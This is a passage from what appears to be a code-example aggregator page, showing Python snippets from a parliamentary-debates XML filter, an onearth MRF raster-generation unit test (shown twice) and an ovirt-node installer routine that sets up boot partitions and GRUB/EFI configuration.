        text = re.sub('<b>\s*(<b>([^<]|<i>\s*\(Urgent Question\)\s*</i>)*</b>\s*)</b>', r'\1', text)
        # <p> <b>[</b> </p> <p> <b>TIME</b> </p>
        text = re.sub('<p>\s*<b>\[</b>\s*</p>\s*<p>\s*<b>([^<]*)</b>\s*</p>', r'<p> <b>[\1</b> </p>', text)
        # And have changed <center> to <span class="centred">
        text = re.sub('<span class="centred">(.*?)</span>', r'<center>\1</center>', text)

    if sdate >= '2015-10-12':
        # annoying double <b> round members rose text
        text = re.sub(r'<b><b>Several hon. Members </b>', '<b>Several hon. Members ', text)

    if sdate >= '2016-01-01':
        # Deal with big heading spotting aname appearing AFTER heading
        text = re.sub('(<h3(?:(?!<h3).)*?)(<a name="ordayhd_\d">)', r'\2\1', text)

    (flatb, gidname) = FILTERfunction(text, sdate)
    for i in range(len(gidname)):
        tempfilenameoldxml = None

        gidnam = gidname[i]
        if gidname[i] == 'lordswms':
            gidnam = 'wms'
        if gidname[i] == 'lordswrans':
            gidnam = 'wrans'
        CreateGIDs(gidnam, sdate, sdatever, flatb[i])
        jfout = safejfout
        if gidname[i] != 'lords':
            jfout = re.sub('(daylord|lordspages)', gidname[i], jfout)

        # wrans case is special, with its question-id numbered gids
        if dname == 'wrans':
            majblocks = CreateWransGIDs(flatb[i], (sdate + sdatever)) # combine the date and datever.  the old style gids stand on the paragraphs still
            bMakeOldWransGidsToNew = (sdate < "2005")

        fout = open(tempfilename, "w")
        WriteXMLHeader(fout);
        fout.write('<publicwhip scrapeversion="%s" latest="yes">\n' % sdatever)

        # go through and output all the records into the file
        if dname == 'wrans':
            for majblock in majblocks:
                WriteXMLspeechrecord(fout, majblock[0], bMakeOldWransGidsToNew, True)
                for qblock in majblock[1]:
                    qblock.WriteXMLrecords(fout, bMakeOldWransGidsToNew)
        else:
            for qb in flatb[i]:
                WriteXMLspeechrecord(fout, qb, False, False)
        fout.write("</publicwhip>\n\n")
        fout.close()

        # load in a previous file and over-write it if necessary
        if xprev:
            xprevin = xprev[0]
            if gidname[i] != 'lords':
                xprevin = re.sub('(daylord|lordspages)', gidname[i], xprevin)
            if os.path.isfile(xprevin):
                xin = open(xprevin, "r")
                xprevs = xin.read()
                xin.close()

                # separate out the scrape versions
                mpw = re.search('<publicwhip([^>]*)>\n([\s\S]*?)</publicwhip>', xprevs)
                if mpw.group(1):
                    re.match(' scrapeversion="([^"]*)" latest="yes"', mpw.group(1)).group(1) == xprev[1]
                # else it's old style xml files that had no scrapeversion or latest attributes
                if dname == 'wrans':
                    xprevcompress = FactorChangesWrans(majblocks, mpw.group(2))
                else:
                    xprevcompress = FactorChanges(flatb[i], mpw.group(2))

                tempfilenameoldxml = tempfile.mktemp(".xml", "pw-filtertempold-", miscfuncs.tmppath)
                foout = open(tempfilenameoldxml, "w")
                WriteXMLHeader(foout)
                foout.write('<publicwhip scrapeversion="%s" latest="no">\n' % xprev[1])
                foout.writelines(xprevcompress)
                foout.write("</publicwhip>\n\n")
                foout.close()

        # in win32 this function leaves the file open and stops it being renamed
        if sys.platform != "win32":
            xmlvalidate.parse(tempfilename) # validate XML before renaming

        # in case of error, an exception is thrown, so this line would not be reached
        # we rename both files (the old and new xml) at once

        if os.path.isfile(jfout):
            os.remove(jfout)
        if not os.path.isdir(os.path.dirname(jfout)):  # Lords output directories need making here
            os.mkdir(os.path.dirname(jfout))
        os.rename(tempfilename, jfout)

        # copy over onto old xml file
        if tempfilenameoldxml:
            if sys.platform != "win32":
                xmlvalidate.parse(tempfilenameoldxml) # validate XML before renaming
            assert os.path.isfile(xprevin)
            os.remove(xprevin)
            os.rename(tempfilenameoldxml, xprevin)

Example 31

Project: onearth
Source File: test_mrfgen.py
View license
    def test_generate_mrf_obpg(self):
        '''
        This portion the following test cases:
            Test using empty MRF with No Copy option
        '''
        # Check MRF generation succeeded
        self.assertTrue(os.path.isfile(self.output_mrf), "MRF generation failed")
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf)
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")

        # This part of the test previously looked for a triplet of files in dataset.GetFileList().         
        if DEBUG:
            print 'Files: {0}, {1}'.format(self.output_ppg, self.output_idx)
        self.assertTrue(os.path.isfile(self.output_ppg), "MRF PPG generation failed")
        self.assertTrue(os.path.isfile(self.output_idx), "MRF IDX generation failed")
        self.assertTrue(os.path.isfile(self.output_zdb), "MRF ZDB generation failed")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        mrf = gdal.Open(self.output_mrf)
        driver = gdal.GetDriverByName("PNG")       
        img = driver.CreateCopy(self.output_img_a, mrf, 0 )
        
        if DEBUG:
            print 'Generated: ' + ' '.join(img.GetFileList())
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount
        self.assertEqual(img.RasterXSize, dataset.RasterXSize, "Size does not match")
        self.assertEqual(img.RasterYSize, dataset.RasterYSize, "Size does not match")
        self.assertEqual(img.RasterCount, dataset.RasterCount, "Size does not match")
        
        '''
        This portion covers the following test cases:
            Test composite MRF with No Copy option
            Test using granule images
            Test using existing MRF
            Test using granule images with Z-level
            Test input images that cross antimeridian
            Test merging of input images with transparency
            Test adding image to existing Z-level
        '''
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z0")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Compare MRF
        img = gdal.Open(self.output_img_b)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_b + " to " + self.compare_img_b
        self.assertTrue(filecmp.cmp(self.output_img_b, self.compare_img_b), "Output composite image does not match")

        '''
        This portion covers the following test cases:        
            Test adding image to new Z-level
            Test adding image to multiple Z-levels
            Test using single image with Z-level
        '''
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z1")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        img = gdal.Open(self.output_img_c)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_c + " to " + self.compare_img_c
        self.assertTrue(filecmp.cmp(self.output_img_c, self.compare_img_c), "Output granule image does not match")
        
        img = None
        
        # Test ZDB
        if DEBUG:
            print "Checking " + self.output_zdb
        con = sqlite3.connect(self.output_zdb)
        cur = con.cursor()
        # Check for existing key
        cur.execute("SELECT COUNT(*) FROM ZINDEX;")
        lid = int(cur.fetchone()[0])
        if DEBUG:
            print "Number of records: " + str(lid)
        self.assertEqual(lid, 2, "Number of records not matching in ZDB")
        # Check for matching keys
        cur.execute("SELECT key_str FROM ZINDEX where z=0;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202', "Time for Z=0 does not match in ZDB")
        cur.execute("SELECT key_str FROM ZINDEX where z=1;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202000000', "Time for Z=1 does not match in ZDB")
        if con:
            con.close()

Example 32

Project: onearth
Source File: test_mrfgen.py
View license
    def test_generate_mrf_obpg(self):
        '''
        This portion the following test cases:
            Test using empty MRF with No Copy option
        '''
        # Check MRF generation succeeded
        self.assertTrue(os.path.isfile(self.output_mrf), "MRF generation failed")
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf)
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")

        # This part of the test previously looked for a triplet of files in dataset.GetFileList().         
        if DEBUG:
            print 'Files: {0}, {1}'.format(self.output_ppg, self.output_idx)
        self.assertTrue(os.path.isfile(self.output_ppg), "MRF PPG generation failed")
        self.assertTrue(os.path.isfile(self.output_idx), "MRF IDX generation failed")
        self.assertTrue(os.path.isfile(self.output_zdb), "MRF ZDB generation failed")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        mrf = gdal.Open(self.output_mrf)
        driver = gdal.GetDriverByName("PNG")       
        img = driver.CreateCopy(self.output_img_a, mrf, 0 )
        
        if DEBUG:
            print 'Generated: ' + ' '.join(img.GetFileList())
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount
        self.assertEqual(img.RasterXSize, dataset.RasterXSize, "Size does not match")
        self.assertEqual(img.RasterYSize, dataset.RasterYSize, "Size does not match")
        self.assertEqual(img.RasterCount, dataset.RasterCount, "Size does not match")
        
        '''
        This portion covers the following test cases:
            Test composite MRF with No Copy option
            Test using granule images
            Test using existing MRF
            Test using granule images with Z-level
            Test input images that cross antimeridian
            Test merging of input images with transparency
            Test adding image to existing Z-level
        '''
        
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z0")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Compare MRF
        img = gdal.Open(self.output_img_b)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_b + " to " + self.compare_img_b
        self.assertTrue(filecmp.cmp(self.output_img_b, self.compare_img_b), "Output composite image does not match")

        '''
        This portion covers the following test cases:        
            Test adding image to new Z-level
            Test adding image to multiple Z-levels
            Test using single image with Z-level
        '''
        # Read MRF
        dataset = gdal.Open(self.output_mrf+":MRF:Z1")
        driver = dataset.GetDriver()
        if DEBUG:
            print 'Driver:', str(driver.LongName)
        self.assertEqual(str(driver.LongName), "Meta Raster Format", "Driver is not Meta Raster Format")
        
        if DEBUG:
            print 'Projection:', str(dataset.GetProjection())
        self.assertEqual(str(dataset.GetProjection()),'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]]')
        
        if DEBUG:
            print 'Size: ',dataset.RasterXSize,'x',dataset.RasterYSize, 'x',dataset.RasterCount
        self.assertEqual(dataset.RasterXSize, 40960, "Size does not match")
        self.assertEqual(dataset.RasterYSize, 20480, "Size does not match")
        self.assertEqual(dataset.RasterCount, 1, "Number of bands do not match")
        
        geotransform = dataset.GetGeoTransform()
        if DEBUG:
            print 'Origin: (',geotransform[0], ',',geotransform[3],')'
        self.assertEqual(geotransform[0], -180.0, "Origin does not match")
        self.assertEqual(geotransform[3], 90.0, "Origin does not match")
        if DEBUG:
            print 'Pixel Size: (',geotransform[1], ',',geotransform[5],')'
        self.assertEqual(float(geotransform[1]), 0.0087890625, "Pixel size does not match")
        self.assertEqual(float(geotransform[5]), -0.0087890625, "Pixel size does not match")
        
        band = dataset.GetRasterBand(1)
        if DEBUG:
            print 'Overviews:', band.GetOverviewCount()
        self.assertEqual(band.GetOverviewCount(), 7, "Overview count does not match")
        
        # Convert and compare MRF
        img = gdal.Open(self.output_img_c)
        if DEBUG:
            print 'Size: ',img.RasterXSize,'x',img.RasterYSize, 'x',img.RasterCount        
            print "Comparing: " + self.output_img_c + " to " + self.compare_img_c
        self.assertTrue(filecmp.cmp(self.output_img_c, self.compare_img_c), "Output granule image does not match")
        
        img = None
        
        # Test ZDB
        if DEBUG:
            print "Checking " + self.output_zdb
        con = sqlite3.connect(self.output_zdb)
        cur = con.cursor()
        # Check for existing key
        cur.execute("SELECT COUNT(*) FROM ZINDEX;")
        lid = int(cur.fetchone()[0])
        if DEBUG:
            print "Number of records: " + str(lid)
        self.assertEqual(lid, 2, "Number of records not matching in ZDB")
        # Check for matching keys
        cur.execute("SELECT key_str FROM ZINDEX where z=0;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202', "Time for Z=0 does not match in ZDB")
        cur.execute("SELECT key_str FROM ZINDEX where z=1;")
        key_str = cur.fetchone()[0]
        if DEBUG:
            print key_str
        self.assertEqual(key_str, '20151202000000', "Time for Z=1 does not match in ZDB")
        if con:
            con.close()

Example 33

Project: ovirt-node
Source File: install.py
View license
    def ovirt_boot_setup(self, reboot="N"):
        self.generate_paths()
        logger.info("Installing the image.")
        # copy grub.efi to safe location
        if _functions.is_efi_boot():
            if "OVIRT_ISCSI_INSTALL" in OVIRT_VARS:
                _functions.system("umount /boot")
            if os.path.isfile("/boot/efi/%s/grubx64.efi" % self.efi_path):
                shutil.copy("/boot/efi/%s/grubx64.efi" % self.efi_path, "/tmp")
            else:
                shutil.copy("/boot/efi/%s/grub.efi" % self.efi_path, "/tmp")
            _functions.mount_boot()
        if "OVIRT_ROOT_INSTALL" in OVIRT_VARS:
            if OVIRT_VARS["OVIRT_ROOT_INSTALL"] == "n":
                logger.info("Root Installation Not Required, Finished.")
                return True
        self.oldtitle=None
        grub_config_file = None
        if _functions.findfs("Boot") and _functions.is_upgrade():
            grub_config_file = "/boot/grub/grub.conf"
            if not _functions.connect_iscsi_root():
                return False
        _functions.mount_liveos()
        if os.path.ismount("/liveos"):
            if os.path.exists("/liveos/vmlinuz0") \
                              and os.path.exists("/liveos/initrd0.img"):
                grub_config_file = self.grub_config_file
        elif not _functions.is_firstboot():
            # find existing iscsi install
            if _functions.findfs("Boot"):
                grub_config_file = "/boot/grub/grub.conf"
            elif os.path.ismount("/dev/.initramfs/live"):
                if not _functions.grub2_available():
                    grub_config_file = "/dev/.initramfs/live/grub/grub.conf"
                else:
                    grub_config_file = "/dev/.initramfs/live/grub2/grub.cfg"
            elif os.path.ismount("/run/initramfs/live"):
                grub_config_file = "/run/initramfs/live/grub/grub.conf"
            if _functions.is_upgrade() and not _functions.is_iscsi_install():
                _functions.mount_liveos()
                grub_config_file = "/liveos/grub/grub.conf"
        if _functions.is_iscsi_install() or _functions.findfs("Boot") \
            and not _functions.is_efi_boot():
            grub_config_file = "/boot/grub/grub.conf"
        if _functions.is_efi_boot():
            logger.debug(str(os.listdir("/liveos")))
            _functions.system("umount /liveos")
            _functions.mount_efi(target="/liveos")
            if self.efi_name == "fedora":
                grub_config_file = "/liveos/EFI/fedora/grub.cfg"
            else:
                grub_config_file = "/liveos/%s/grub.conf" % self.efi_path
        grub_config_file_exists = grub_config_file is not None \
            and os.path.exists(grub_config_file)
        logger.debug("Grub config file is: %s" % grub_config_file)
        logger.debug("Grub config file exists: %s" % grub_config_file_exists)
        if not grub_config_file is None and os.path.exists(grub_config_file):
            f=open(grub_config_file)
            oldgrub=f.read()
            f.close()
            if _functions.grub2_available():
                m=re.search("^menuentry (.*)$", oldgrub, re.MULTILINE)
            else:
                m=re.search("^title (.*)$", oldgrub, re.MULTILINE)
            if m is not None:
                self.oldtitle=m.group(1)
                # strip off extra title characters
                if _functions.grub2_available():
                    self.oldtitle = self.oldtitle.replace('"','').strip(" {")
        _functions.system("umount /liveos/efi")
        _functions.system("umount /liveos")
        if _functions.is_iscsi_install() or _functions.findfs("Boot"):
            self.boot_candidate = None
            boot_candidate_names = ["BootBackup", "BootUpdate", "BootNew"]
            for trial in range(1, 3):
                time.sleep(1)
                for candidate_name in boot_candidate_names:
                    logger.debug(os.listdir("/dev/disk/by-label"))
                    if _functions.findfs(candidate_name):
                        self.boot_candidate = candidate_name
                        break
                logger.debug("Trial %s to find candidate (%s)" % \
                             (trial, candidate_name))
                if self.boot_candidate:
                    logger.debug("Found candidate: %s" % self.boot_candidate)
                    break

            if not self.boot_candidate:
                logger.error("Unable to find boot partition")
                label_debug = ''
                for label in os.listdir("/dev/disk/by-label"):
                    label_debug += "%s\n" % label
                label_debug += _functions.subprocess_closefds("blkid", \
                                          shell=True, stdout=subprocess.PIPE,
                                          stderr=subprocess.STDOUT).stdout.read()
                logger.debug(label_debug)
                return False
            else:
                boot_candidate_dev = _functions.findfs(self.boot_candidate)
            # prepare Root partition update
            if self.boot_candidate != "BootNew":
                e2label_cmd = "e2label \"%s\" BootNew" % boot_candidate_dev
                logger.debug(e2label_cmd)
                if not _functions.system(e2label_cmd):
                    logger.error("Failed to label new Boot partition")
                    return False
            _functions.system("umount /boot")
            _functions.system("mount %s /boot &>/dev/null" \
                              % boot_candidate_dev)

        candidate = None
        candidate_dev = None
        candidate_names = ["RootBackup", "RootUpdate", "RootNew"]
        for trial in range(1, 3):
            time.sleep(1)
            for candidate_name in candidate_names:
                candidate_dev = _functions.findfs(candidate_name)
                logger.debug("Finding %s: '%s'" % (candidate_name, candidate_dev))
                if candidate_dev:
                    candidate = candidate_name
                    logger.debug("Found: %s" % candidate)
                    break
            logger.debug("Trial %s to find candidate (%s)" % (trial,
                                                              candidate_name))
            if candidate:
                logger.debug("Found candidate: '%s'" % candidate)
                break

        if not candidate:
            logger.error("Unable to find root partition")
            label_debug = ''
            for label in os.listdir("/dev/disk/by-label"):
                label_debug += "%s\n" % label
            label_debug += _functions.subprocess_closefds("blkid", shell=True,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.STDOUT).stdout.read()
            logger.debug(label_debug)
            return False

        try:
            self.disk = candidate_dev
            logger.info("Candidate device: %s" % candidate_dev)
            logger.info("Candidate disk: %s" % self.disk)
            # grub2 starts at part 1
            self.partN = int(self.disk[-1:])
            if not _functions.grub2_available():
                self.partN = self.partN - 1
        except:
            logger.debug("Failed to get partition", exc_info=True)
            return False

        if self.disk is None or self.partN < 0:
            logger.error("Failed to determine Root partition number")
            return False
        # prepare Root partition update
        if candidate != "RootNew":
            e2label_cmd = "e2label \"%s\" RootNew" % candidate_dev
            logger.debug(e2label_cmd)
            if not _functions.system(e2label_cmd):
                logger.error("Failed to label new Root partition")
                return False
        mount_cmd = "mount \"%s\" /liveos" % candidate_dev
        if not _functions.system(mount_cmd):
            logger.error("Failed to mount %s on /liveos" % candidate_dev)
            _functions.system("lsof")
            _functions.system("dmsetup info -c")
            _functions.system("cat /proc/mounts")
            _functions.system("multipath -ll")
            _functions.system("lsblk")
            _functions.system("ls -l /dev/mapper")
        _functions.system("rm -rf /liveos/LiveOS")
        _functions.system("mkdir -p /liveos/LiveOS")
        _functions.mount_live()

        if os.path.isdir(self.grub_dir):
            shutil.rmtree(self.grub_dir)
        if not os.path.exists(self.grub_dir):
            os.makedirs(self.grub_dir)
            if _functions.is_efi_boot():
                logger.info("efi detected, installing efi configuration")
                _functions.system("mkdir /liveos/efi")
                _functions.mount_efi()
                _functions.system("mkdir -p /liveos/efi/%s" % self.efi_path)
                if _functions.is_iscsi_install() or _functions.is_efi_boot():
                    if os.path.isfile("/tmp/grubx64.efi"):
                        shutil.copy("/tmp/grubx64.efi",
                                    "/liveos/efi/%s/grubx64.efi" %
                                    self.efi_path)
                    else:
                        shutil.copy("/tmp/grub.efi",
                                    "/liveos/efi/%s/grub.efi" % self.efi_path)
                elif os.path.isfile("/boot/efi/%s/grubx64.efi" %
                        self.efi_path):
                    shutil.copy("/boot/efi/%s/grubx64.efi" % self.efi_path,
                          "/liveos/efi/%s/grubx64.efi" % self.efi_path)
                else:
                    shutil.copy("/boot/efi/%s/grub.efi" % self.efi_path,
                          "/liveos/efi/%s/grub.efi" % self.efi_path)
                if _functions.is_iscsi_install() or _functions.findfs("BootNew"):
                    self.disk = _functions.findfs("BootNew")
                if not "/dev/mapper/" in self.disk:
                    efi_disk = self.disk[:-1]
                else:
                    efi_disk = re.sub(r'p?[1,2,3]$', "", self.disk)
                # generate grub legacy config for efi partition
                #remove existing efi entries
                _functions.remove_efi_entry(_functions.PRODUCT_SHORT)
                if self.efi_name == "fedora":
                    _functions.add_efi_entry(_functions.PRODUCT_SHORT,
                                             ("\\EFI\\%s\\grubx64.efi" %
                                              self.efi_name),
                                             efi_disk)
                else:
                    if os.path.isfile("/liveos/efi/%s/grubx64.efi" %
                            self.efi_path):
                        _functions.add_efi_entry(_functions.PRODUCT_SHORT,
                                                 ("\\EFI\\%s\\grubx64.efi" %
                                                  self.efi_name),
                                                 efi_disk)
                    else:
                        _functions.add_efi_entry(_functions.PRODUCT_SHORT,
                                                 ("\\EFI\\%s\\grub.efi" %
                                                  self.efi_name),
                                                 efi_disk)
        self.kernel_image_copy()

        # reorder tty0 to allow both serial and phys console after installation
        if _functions.is_iscsi_install() or _functions.findfs("BootNew"):
            self.root_param = "root=live:LABEL=Root"
            if "OVIRT_NETWORK_LAYOUT" in OVIRT_VARS and \
                OVIRT_VARS["OVIRT_NETWORK_LAYOUT"] == "bridged":
                network_conf = "ip=br%s:dhcp bridge=br%s:%s" % \
                                (OVIRT_VARS["OVIRT_BOOTIF"],
                                 OVIRT_VARS["OVIRT_BOOTIF"],
                                 OVIRT_VARS["OVIRT_BOOTIF"])
            else:
                network_conf = "ip=%s:dhcp" % OVIRT_VARS["OVIRT_BOOTIF"]
            self.bootparams = "netroot=iscsi:%s::%s::%s %s " % (
                OVIRT_VARS["OVIRT_ISCSI_TARGET_HOST"],
                OVIRT_VARS["OVIRT_ISCSI_TARGET_PORT"],
                OVIRT_VARS["OVIRT_ISCSI_TARGET_NAME"],
                network_conf)
            if "OVIRT_ISCSI_NAME" in OVIRT_VARS:
                self.bootparams+= "iscsi_initiator=%s " % \
                    OVIRT_VARS["OVIRT_ISCSI_NAME"]
        else:
            self.root_param = "root=live:LABEL=Root"
            self.bootparams = "ro rootfstype=auto rootflags=ro "
        self.bootparams += OVIRT_VARS["OVIRT_BOOTPARAMS"].replace(
                                                            "console=tty0", ""
                                                            ).replace(
                                                            "rd_NO_MULTIPATH",
                                                            "")

        if " " in self.disk:
            # workaround for grub setup failing with spaces in dev.name:
            # use first active sd* device
            self.disk = re.sub("p[1,2,3]$", "", self.disk)
            grub_disk_cmd = ("multipath -l " +
                             "\"" + self.disk + "\" " +
                             "| egrep -o '[0-9]+:.*' " +
                             "| awk '/ active / {print $2}' " +
                             "| head -n1")
            logger.debug(grub_disk_cmd)
            grub_disk = _functions.subprocess_closefds(grub_disk_cmd,
                                            shell=True,
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.STDOUT)
            grub_disk_output, grub_disk_err = grub_disk.communicate()
            self.disk = grub_disk_output.strip()
            if "cciss" in self.disk:
                self.disk = self.disk.replace("!", "/")
            # flush to sync DM and blockdev, workaround from rhbz#623846#c14
            sysfs = open("/proc/sys/vm/drop_caches", "w")
            sysfs.write("3")
            sysfs.close()
        if not self.disk.startswith("/dev/"):
